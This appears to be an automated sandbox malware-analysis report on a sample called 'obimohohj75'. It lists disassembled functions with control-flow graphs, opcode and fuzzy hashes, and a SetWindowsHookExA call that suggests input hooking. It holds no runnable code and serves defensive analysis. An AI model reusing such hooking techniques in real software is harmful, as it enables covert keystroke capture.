                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6a80c3bb5bff64a7eac7c747e7709243d57381d053b82df2f223c74163cf4fe
                                                          • Instruction ID: 02c9c2abec1f24b8828af117f826a2ff24f49081fcd449559db3c81d453c3b40
                                                          • Opcode Fuzzy Hash: d6a80c3bb5bff64a7eac7c747e7709243d57381d053b82df2f223c74163cf4fe
                                                          • Instruction Fuzzy Hash: CD331D31D1071A8ACB15DF68C894AADF7B1FF99300F15C79AE449A7211EB70EAC5CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C4518 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3305 1c4518-1c457e 3307 1c45c8-1c45ca 3305->3307 3308 1c4580-1c458b 3305->3308 3309 1c45cc-1c45e5 3307->3309 3308->3307 3310 1c458d-1c4599 3308->3310 3316 1c45e7-1c45f3 3309->3316 3317 1c4631-1c4633 3309->3317 3311 1c45bc-1c45c6 3310->3311 3312 1c459b-1c45a5 3310->3312 3311->3309 3314 1c45a9-1c45b8 3312->3314 3315 1c45a7 3312->3315 3314->3314 3318 1c45ba 3314->3318 3315->3314 3316->3317 3319 1c45f5-1c4601 3316->3319 3320 1c4635-1c464d 3317->3320 3318->3311 3321 1c4624-1c462f 3319->3321 3322 1c4603-1c460d 3319->3322 3326 1c464f-1c465a 3320->3326 3327 1c4697-1c4699 3320->3327 3321->3320 3323 1c460f 3322->3323 3324 1c4611-1c4620 3322->3324 3323->3324 3324->3324 3328 1c4622 3324->3328 3326->3327 3329 1c465c-1c4668 3326->3329 3330 1c469b-1c46b3 3327->3330 3328->3321 3331 1c466a-1c4674 3329->3331 3332 1c468b-1c4695 3329->3332 3337 1c46fd-1c46ff 3330->3337 3338 1c46b5-1c46c0 3330->3338 3333 1c4678-1c4687 3331->3333 3334 1c4676 3331->3334 3332->3330 3333->3333 3336 1c4689 3333->3336 3334->3333 3336->3332 3339 1c4701-1c4774 3337->3339 3338->3337 3340 1c46c2-1c46ce 3338->3340 3349 1c477a-1c4788 3339->3349 3341 1c46d0-1c46da 3340->3341 3342 1c46f1-1c46fb 3340->3342 3344 1c46dc 3341->3344 3345 1c46de-1c46ed 3341->3345 3342->3339 3344->3345 3345->3345 3346 1c46ef 3345->3346 3346->3342 3350 1c478a-1c4790 3349->3350 3351 1c4791-1c47f1 3349->3351 3350->3351 3358 1c4801-1c4805 3351->3358 3359 1c47f3-1c47f7 3351->3359 3361 1c4815-1c4819 3358->3361 3362 1c4807-1c480b 3358->3362 3359->3358 3360 1c47f9 3359->3360 3360->3358 3363 1c4829-1c482d 3361->3363 3364 1c481b-1c481f 3361->3364 3362->3361 3365 1c480d 3362->3365 3367 1c483d-1c4841 3363->3367 3368 1c482f-1c4833 3363->3368 3364->3363 3366 1c4821 3364->3366 3365->3361 3366->3363 3370 1c4851-1c4855 3367->3370 3371 1c4843-1c4847 3367->3371 3368->3367 3369 1c4835 3368->3369 3369->3367 3373 1c4865 3370->3373 3374 1c4857-1c485b 3370->3374 3371->3370 3372 1c4849-1c484c call 1c0ab8 3371->3372 3372->3370 3377 1c4866 3373->3377 3374->3373 3376 1c485d-1c4860 call 1c0ab8 3374->3376 3376->3373 3377->3377
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 385fbca34028624ad0be011993f553bf1c447139f18a4053295fb7f0456bfa92
                                                          • Instruction ID: 76998a3e960b6fde82b68b2835c9d49d52bdbc86579df99873c4c7263aeb7cb2
                                                          • Opcode Fuzzy Hash: 385fbca34028624ad0be011993f553bf1c447139f18a4053295fb7f0456bfa92
                                                          • Instruction Fuzzy Hash: BBB16B70E042598FDB10CFA8C8A5BEDBBF2AF99314F14852DD815AB294EB74D845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C3900 Relevance: .2, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4583bb05fde5aa3e98bbe5318a46a3c25efa1f42dd664966e779460943745729
                                                          • Instruction ID: 24949a88a02f9a30837d97dad28fc6e066d7cc3d063cb2429570b2a96109e143
                                                          • Opcode Fuzzy Hash: 4583bb05fde5aa3e98bbe5318a46a3c25efa1f42dd664966e779460943745729
                                                          • Instruction Fuzzy Hash: F5914870E002098FDF14CFA9C985BADBBF2AF98314F14C52DE425AB294EB74D945CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CE3BD Relevance: 2.6, Strings: 2, Instructions: 110COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1553 1ce3bd-1ce3eb 1554 1ce3ed-1ce3f0 1553->1554 1555 1ce3f2-1ce40e 1554->1555 1556 1ce413-1ce415 1554->1556 1555->1556 1557 1ce41c-1ce41f 1556->1557 1558 1ce417 1556->1558 1557->1554 1560 1ce421-1ce447 1557->1560 1558->1557 1565 1ce44e-1ce47c 1560->1565 1570 1ce47e-1ce488 1565->1570 1571 1ce4f3-1ce517 1565->1571 1574 1ce48a-1ce490 1570->1574 1575 1ce4a0-1ce4f1 1570->1575 1577 1ce519 1571->1577 1578 1ce521 1571->1578 1579 1ce494-1ce496 1574->1579 1580 1ce492 1574->1580 1575->1570 1575->1571 1577->1578 1579->1575 1580->1575
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !$PHp
                                                          • API String ID: 0-1316090587
                                                          • Opcode ID: 180b78b84654a40b0459f2bcb15126bffd3d64fe84d1303577275d1179bc2532
                                                          • Instruction ID: 2a1f4bacd837d481b380e9f6df0a7ffe58668c1faf44a0855a7fe99ffb0402c5
                                                          • Opcode Fuzzy Hash: 180b78b84654a40b0459f2bcb15126bffd3d64fe84d1303577275d1179bc2532
                                                          • Instruction Fuzzy Hash: 28412F30B002458FCB1A9B74C864B6E3BE3AF99354B64492CE402DB395EF35CD4ACB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C6590 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2351 1c6590-1c65cf 2355 1c65d1-1c65d4 2351->2355 2356 1c65d6-1c65fc 2355->2356 2357 1c6601-1c6604 2355->2357 2356->2357 2358 1c6606-1c662c 2357->2358 2359 1c6631-1c6634 2357->2359 2358->2359 2360 1c6636-1c665c 2359->2360 2361 1c6661-1c6664 2359->2361 2360->2361 2363 1c6666 2361->2363 2364 1c6671-1c6674 2361->2364 2372 1c666c 2363->2372 2367 1c6676-1c669c 2364->2367 2368 1c66a1-1c66a4 2364->2368 2367->2368 2370 1c66a6-1c66cc 2368->2370 2371 1c66d1-1c66d4 2368->2371 2370->2371 2376 1c66d6-1c66ec 2371->2376 2377 1c66f1-1c66f4 2371->2377 2372->2364 2376->2377 2381 1c66f6-1c671c 2377->2381 2382 1c6721-1c6724 2377->2382 2381->2382 2384 1c6726-1c674c 2382->2384 2385 1c6751-1c6754 2382->2385 2384->2385 2390 1c6756-1c677c 2385->2390 2391 1c6781-1c6784 2385->2391 2390->2391 2392 1c6795-1c6798 2391->2392 2393 1c6786-1c6788 2391->2393 2400 1c679a-1c67c0 2392->2400 2401 1c67c5-1c67c8 2392->2401 2568 1c678a call 1c7e10 2393->2568 2569 1c678a call 1c7e01 2393->2569 2570 1c678a call 1c7eb3 2393->2570 2400->2401 2402 1c67ca-1c67f0 2401->2402 2403 1c67f5-1c67f8 2401->2403 2402->2403 2408 1c67fa-1c6820 2403->2408 2409 1c6825-1c6828 2403->2409 2404 1c6790 2404->2392 2408->2409 2411 1c682a-1c6850 2409->2411 2412 1c6855-1c6858 2409->2412 2411->2412 2416 1c685a-1c6880 2412->2416 2417 1c6885-1c6888 2412->2417 2416->2417 2420 1c688a-1c68b0 2417->2420 2421 1c68b5-1c68b8 2417->2421 2420->2421 2425 1c68ba-1c68e0 2421->2425 2426 1c68e5-1c68e8 2421->2426 2425->2426 2429 1c68ea-1c6910 2426->2429 2430 1c6915-1c6918 2426->2430 2429->2430 2435 1c691a-1c6940 2430->2435 2436 1c6945-1c6948 2430->2436 2435->2436 2439 1c694a-1c6970 2436->2439 2440 1c6975-1c6978 2436->2440 2439->2440 2445 1c697a-1c69a0 2440->2445 2446 1c69a5-1c69a8 2440->2446 2445->2446 2449 1c69aa-1c69d0 2446->2449 2450 1c69d5-1c69d8 2446->2450 2449->2450 2455 1c69da-1c6a00 2450->2455 2456 1c6a05-1c6a08 2450->2456 2455->2456 2459 1c6a0a-1c6a30 2456->2459 2460 1c6a35-1c6a38 2456->2460 2459->2460 2465 1c6a3a-1c6a60 2460->2465 2466 1c6a65-1c6a68 2460->2466 2465->2466 2469 1c6a6a-1c6a90 2466->2469 2470 1c6a95-1c6a98 2466->2470 2469->2470 2475 1c6a9a-1c6ac0 2470->2475 2476 1c6ac5-1c6ac8 2470->2476 2475->2476 2479 1c6aca-1c6af0 2476->2479 2480 1c6af5-1c6af8 2476->2480 2479->2480 2485 1c6afa-1c6b20 2480->2485 2486 1c6b25-1c6b28 2480->2486 2485->2486 2489 1c6b2a-1c6b50 2486->2489 2490 1c6b55-1c6b58 2486->2490 2489->2490 2495 1c6b5a-1c6b80 2490->2495 2496 1c6b85-1c6b88 2490->2496 2495->2496 2499 1c6b8a-1c6bb0 2496->2499 2500 1c6bb5-1c6bb8 2496->2500 2499->2500 2505 1c6bba-1c6be0 2500->2505 2506 1c6be5-1c6be8 2500->2506 2505->2506 2509 1c6bea-1c6c10 2506->2509 2510 1c6c15-1c6c18 2506->2510 2509->2510 2515 1c6c1a-1c6c40 2510->2515 2516 1c6c45-1c6c48 2510->2516 2515->2516 2519 1c6c4a-1c6c70 2516->2519 2520 1c6c75-1c6c78 2516->2520 2519->2520 2525 1c6c7a-1c6ca0 2520->2525 2526 1c6ca5-1c6ca8 2520->2526 2525->2526 2529 1c6caa-1c6cd0 2526->2529 2530 1c6cd5-1c6cd8 2526->2530 2529->2530 2535 1c6cda-1c6d00 2530->2535 2536 1c6d05-1c6d08 2530->2536 2535->2536 2539 1c6d0a-1c6d30 2536->2539 2540 1c6d35-1c6d38 2536->2540 2539->2540 2545 1c6d3a-1c6d4e 2540->2545 2546 1c6d53-1c6d56 2540->2546 2545->2546 2549 1c6d58-1c6d7e 2546->2549 2550 1c6d83-1c6d85 2546->2550 2549->2550 2555 1c6d8c-1c6d8f 2550->2555 2556 1c6d87 2550->2556 2555->2355 2562 1c6d95-1c6d9b 2555->2562 2556->2555 2568->2404 2569->2404 2570->2404
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0K
                                                          • API String ID: 0-3234548752
                                                          • Opcode ID: 03e390246fb2da2afac990c510d567039e5cff1ae4ad563d41c96b4a79d68282
                                                          • Instruction ID: 0256ef909ca6ea3eee33945bb3a225f11ea348970c2ef5703c12c6416357560d
                                                          • Opcode Fuzzy Hash: 03e390246fb2da2afac990c510d567039e5cff1ae4ad563d41c96b4a79d68282
                                                          • Instruction Fuzzy Hash: 1A2269307003069BCB16AB28D851B2D36A2FB95345B608D3DE009DB765EF35EC8B9BD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00469FF8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2571 469ff8-46a042 2573 46a044-46a04c 2571->2573 2574 46a04e-46a080 SetWindowsHookExA 2571->2574 2573->2574 2575 46a082-46a088 2574->2575 2576 46a089-46a0a9 2574->2576 2575->2576
                                                          APIs
                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0046A073
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625937336.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_460000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: ff6371ea19802f07ea3c462b2dac7baccf3c04e8a6b106b8c2e20b1a47b63c26
                                                          • Instruction ID: 44fcf9e0723949487c79111f67fa11a9822684d96b868aff3911d6bae08783b7
                                                          • Opcode Fuzzy Hash: ff6371ea19802f07ea3c462b2dac7baccf3c04e8a6b106b8c2e20b1a47b63c26
                                                          • Instruction Fuzzy Hash: 4421E3B5D002099FCB14CF9AD944BEEFBF5EB88310F14842AE419A7250D778A944CFA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C5088 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2580 1c5088-1c50a0 2581 1c50a2-1c50a5 2580->2581 2582 1c50b4-1c50b7 2581->2582 2583 1c50a7-1c50ad 2581->2583 2585 1c50b9-1c50c0 2582->2585 2586 1c50ee-1c50f1 2582->2586 2584 1c50af 2583->2584 2583->2585 2584->2582 2587 1c50c7-1c50e7 2585->2587 2588 1c50c2-1c50c6 2585->2588 2586->2583 2589 1c50f3-1c50f6 2586->2589 2590 1c512c-1c512f 2587->2590 2591 1c50e9 2587->2591 2588->2587 2592 1c511d-1c5120 2589->2592 2593 1c50f8-1c5104 2589->2593 2596 1c51fa-1c5224 2590->2596 2597 1c5135-1c515b 2590->2597 2591->2586 2594 1c5127-1c512a 2592->2594 2595 1c5122-1c5124 2592->2595 2607 1c510a-1c5118 2593->2607 2594->2590 2598 1c5160-1c5163 2594->2598 2595->2594 2606 1c5226-1c5228 2596->2606 2597->2598 2602 1c517a-1c517d 2598->2602 2603 1c5165-1c5175 2598->2603 2604 1c517f-1c5180 2602->2604 2605 1c5185-1c5188 2602->2605 2603->2602 2604->2605 2609 1c518a-1c519e 2605->2609 2610 1c51bb-1c51bd 2605->2610 2612 1c522f-1c5232 2606->2612 2613 1c522a 2606->2613 2607->2592 2622 1c51a4 2609->2622 2623 1c51a0-1c51a2 2609->2623 2615 1c51bf 2610->2615 2616 1c51c4-1c51c7 2610->2616 2612->2606 2617 1c5234-1c5241 2612->2617 2613->2612 2615->2616 2616->2581 2620 1c51cd-1c51eb 2616->2620 2625 1c5259-1c52cf call 1c4acc call 1c4adc call 1c4aec 2617->2625 2626 1c5243-1c5249 2617->2626 2636 1c51f2-1c51f9 2620->2636 2627 1c51a7-1c51b6 2622->2627 2623->2627 2646 1c52d1-1c52da 2625->2646 2647 1c52f2 2625->2647 2628 1c524d-1c524f 2626->2628 2629 1c524b 2626->2629 2627->2610 2628->2625 2629->2625 2648 1c52dc-1c52df 2646->2648 2649 1c52e1-1c52ee 2646->2649 2650 1c52f5-1c530c 2647->2650 2651 1c52f0 2648->2651 2649->2651 2655 1c530e-1c5336 call 1c0b34 2650->2655 2656 1c5366-1c539b 2650->2656 2651->2650 2665 1c533c-1c5358 2655->2665 2658 1c539d 2656->2658 2659 1c53a6 2656->2659 2658->2659 2661 1c53a7 2659->2661 2661->2661 2667 1c535a 2665->2667 2668 1c5363 2665->2668 2667->2668 2668->2656
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp
                                                          • API String ID: 0-3405495957
                                                          • Opcode ID: 986a7cdd2b856b10c818658c69d090d7f88c9469899922ae4d05057332559845
                                                          • Instruction ID: 6b4a64bceadabcde34c5f20d35558054f2304376c04f5d63a989a037c44c42ca
                                                          • Opcode Fuzzy Hash: 986a7cdd2b856b10c818658c69d090d7f88c9469899922ae4d05057332559845
                                                          • Instruction Fuzzy Hash: DF914834B106158FCB14DB68C498BAE77F2BFA8711F254569E406DB3A0DB75EC81CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C5C28 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2708 1c5c28-1c5c3c 2709 1c5c3e-1c5c41 2708->2709 2710 1c5c74-1c5c77 2709->2710 2711 1c5c43-1c5c57 2709->2711 2712 1c5c79-1c5c80 2710->2712 2713 1c5c8b-1c5c8e 2710->2713 2721 1c5c5d 2711->2721 2722 1c5c59-1c5c5b 2711->2722 2714 1c5d9b-1c5da1 2712->2714 2715 1c5c86 2712->2715 2716 1c5c9e-1c5ca1 2713->2716 2717 1c5c90 call 1c6590 2713->2717 2715->2713 2719 1c5cdd-1c5cdf 2716->2719 2720 1c5ca3-1c5cd8 2716->2720 2723 1c5c96-1c5c99 2717->2723 2724 1c5ce6-1c5ce9 2719->2724 2725 1c5ce1 2719->2725 2720->2719 2726 1c5c60-1c5c6f 2721->2726 2722->2726 2723->2716 2724->2709 2727 1c5cef-1c5cfe 2724->2727 2725->2724 2726->2710 2730 1c5d28-1c5d3d 2727->2730 2731 1c5d00-1c5d26 2727->2731 2730->2714 2731->2730
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp
                                                          • API String ID: 0-3405495957
                                                          • Opcode ID: 465a3eb34b3c254398a3c8cad4a863902883d5dbe1685a43d57a61e3c9c06648
                                                          • Instruction ID: 2083f28bc155f4ba1456872077ede533afce255943925c4ac33847ad21017a19
                                                          • Opcode Fuzzy Hash: 465a3eb34b3c254398a3c8cad4a863902883d5dbe1685a43d57a61e3c9c06648
                                                          • Instruction Fuzzy Hash: 7A317070E007099BDB14CFA4D484BAEB7B6EF95310F208529E806EB250EB71ED81CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8028 Relevance: .4, Instructions: 355COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3160 1c8028-1c8047 3161 1c8049-1c804c 3160->3161 3162 1c804e-1c8053 3161->3162 3163 1c8056-1c8059 3161->3163 3162->3163 3164 1c835e-1c8367 3163->3164 3165 1c805f-1c8062 3163->3165 3168 1c836d-1c8377 3164->3168 3169 1c80d8-1c80e1 3164->3169 3166 1c8064-1c8080 3165->3166 3167 1c8085-1c8088 3165->3167 3166->3167 3172 1c80bd-1c80c0 3167->3172 3173 1c808a-1c80b8 3167->3173 3170 1c837a-1c83aa 3169->3170 3171 1c80e7-1c80ee 3169->3171 3186 1c83ac-1c83af 3170->3186 3177 1c80f3-1c80f6 3171->3177 3174 1c80c2 3172->3174 3175 1c80d3-1c80d6 3172->3175 3173->3172 3300 1c80c5 call 1c833e 3174->3300 3301 1c80c5 call 1c8028 3174->3301 3302 1c80c5 call 1c8388 3174->3302 3303 1c80c5 call 1c8140 3174->3303 3304 1c80c5 call 1c8390 3174->3304 3175->3169 3175->3177 3178 1c80f8-1c8107 3177->3178 3179 1c8112-1c8114 3177->3179 3194 1c810d 3178->3194 3195 1c835b 3178->3195 3184 1c811b-1c811e 3179->3184 3185 1c8116 3179->3185 3182 1c80cb-1c80ce 3182->3175 3184->3161 3190 1c8124-1c814c call 1c8960 3184->3190 3185->3184 3187 1c8534-1c853e 3186->3187 3188 1c83b5-1c83b8 3186->3188 3192 1c83ba-1c83c8 3188->3192 3193 1c83d3-1c83d6 3188->3193 3298 1c814f call 1cbe88 3190->3298 3299 1c814f call 1cbf50 3190->3299 3203 1c83ce 3192->3203 3204 1c8489-1c84ab 3192->3204 3197 1c83e8-1c83eb 3193->3197 3198 1c83d8 3193->3198 3194->3179 3195->3164 3200 1c83ed-1c8405 3197->3200 3201 1c8410-1c8413 3197->3201 3205 1c83e0-1c83e3 3198->3205 3218 1c851a-1c851d 3200->3218 3219 1c840b 3200->3219 3206 1c8415-1c842e 3201->3206 3207 1c8433-1c8436 3201->3207 3203->3193 3205->3197 3206->3207 3209 1c8438-1c843b 3207->3209 3210 1c8457-1c8460 3207->3210 3214 1c843d-1c8440 3209->3214 3215 1c8445-1c8448 3209->3215 3216 1c846c-1c8475 3210->3216 3217 1c8462 3210->3217 3214->3215 3222 1c844a-1c844f 3215->3222 3223 1c8452-1c8455 3215->3223 3225 1c853f-1c8553 3216->3225 3226 1c847b-1c847f 3216->3226 3224 1c8467-1c846a 3217->3224 3220 1c8522-1c8524 3218->3220 3219->3201 3229 1c852b-1c852e 3220->3229 3230 1c8526 3220->3230 3221 1c8155-1c8157 3221->3195 3231 1c815d-1c816b 3221->3231 3222->3223 3223->3210 3223->3224 3224->3216 3232 1c8484-1c8487 3224->3232 3226->3232 3229->3186 3229->3187 3230->3229 3231->3195 3240 1c8171-1c81ce 3231->3240 3232->3204 3233 1c84ac-1c84af 3232->3233 3235 1c84ce-1c84d1 3233->3235 3236 1c84b1-1c84c9 3233->3236 3238 1c84f0-1c84f3 3235->3238 3239 1c84d3-1c84eb 3235->3239 3236->3235 3242 1c8515-1c8518 3238->3242 3243 1c84f5-1c8510 3238->3243 3239->3238 3254 1c829f-1c82b9 3240->3254 3255 1c81d4-1c8227 3240->3255 3242->3218 3242->3220 3243->3242 3260 1c82bb-1c82bf 3254->3260 3273 1c8229-1c8245 3255->3273 3274 1c8247-1c826a call 1c0d10 3255->3274 3262 1c82d0 3260->3262 3263 1c82c1-1c82ce 3260->3263 3264 1c82d5-1c82d7 3262->3264 3263->3264 3265 1c82d9-1c82db 3264->3265 3266 1c8343-1c8355 3264->3266 3268 1c82dd-1c82e7 3265->3268 3269 1c82e9 3265->3269 3266->3195 3266->3240 3270 1c82ee-1c82f0 3268->3270 3269->3270 3270->3266 3275 1c82f2-1c82f4 3270->3275 3286 1c826c-1c829d 3273->3286 3274->3286 3275->3266 3276 1c82f6-1c833c 3275->3276 3276->3266 3286->3260 3298->3221 3299->3221 3300->3182 3301->3182 3302->3182 3303->3182 3304->3182
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2bccfe35a97f816513aef36894ea7828eaf0870535e5a3d0d91ceb1ff245dcdc
                                                          • Instruction ID: d2cb514886227abb705912f943b30cf278354b8ba4ab7570123caa52429b4f1b
                                                          • Opcode Fuzzy Hash: 2bccfe35a97f816513aef36894ea7828eaf0870535e5a3d0d91ceb1ff245dcdc
                                                          • Instruction Fuzzy Hash: B1D14F34A002059FCB15DBA8D894BADBBB2FF98310F248569E806D73A5DF35ED46CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8960 Relevance: .2, Instructions: 216COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df07ae3e8f26e7d5358187356eb3056cfde17e31ff5042f7aabd55dcee9085eb
                                                          • Instruction ID: 206a54ce974b7d8577c8ee08384be879e8dbd73c33b3c623e464203031cd218f
                                                          • Opcode Fuzzy Hash: df07ae3e8f26e7d5358187356eb3056cfde17e31ff5042f7aabd55dcee9085eb
                                                          • Instruction Fuzzy Hash: 9C817E71A002048FDB14DF68D894B9DBBB1FF98310F14C5AAE909AB395EB71DD45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8390 Relevance: .1, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1f8848045da4959b4a55ea6d96bbc0ebede7de8bd1e0636e25886d6f20cff5f
                                                          • Instruction ID: 5284b84b62d2b8b6b502f10ae540ddd6afe5b0a8a000318ae19455110ae5674c
                                                          • Opcode Fuzzy Hash: b1f8848045da4959b4a55ea6d96bbc0ebede7de8bd1e0636e25886d6f20cff5f
                                                          • Instruction Fuzzy Hash: DC41C234B002468FDF259BA8D8D0B7EB7A6EBA5310F60487ED509DB351DB35DC4A8782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8388 Relevance: .1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9419496fe77d56ab77564b315c95bfce28ad7c6080eb04b7bf39516c279d0f84
                                                          • Instruction ID: 45abe514efd620abf9edb42cea0cc1be57edd9f5c447b63082cc405dec479b92
                                                          • Opcode Fuzzy Hash: 9419496fe77d56ab77564b315c95bfce28ad7c6080eb04b7bf39516c279d0f84
                                                          • Instruction Fuzzy Hash: 2D31AE71B002068BDF25CFA8C8C0B7EB7A2FBA5310F64482ED509DB241DB34DC858792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CE280 Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0bb7c38d5a2c12ee777f180e30316e51f669fd308cd6e6d5c156b383aaf4bb8f
                                                          • Instruction ID: 4089b554e17321809978b4491caa6bdda73f3779fa5c15946b8d363ab28b1486
                                                          • Opcode Fuzzy Hash: 0bb7c38d5a2c12ee777f180e30316e51f669fd308cd6e6d5c156b383aaf4bb8f
                                                          • Instruction Fuzzy Hash: 14311971A002459FDB15CF64D994BAEB7F2BF99300F108629E806AB264EB70EC46CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CE290 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cd2fea925b2823b05a0fc2024d34adb510fe500b60bee2bb680f5c97838b7f0
                                                          • Instruction ID: 4316252db3829c61e648e0ced360e7c9a4d9f229aac9d30f5cc5a144634b185b
                                                          • Opcode Fuzzy Hash: 3cd2fea925b2823b05a0fc2024d34adb510fe500b60bee2bb680f5c97838b7f0
                                                          • Instruction Fuzzy Hash: CE312970A006499BDB19DFA4D954BAEB7F6BF99300F508629E806A7350EB70EC46CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C2168 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
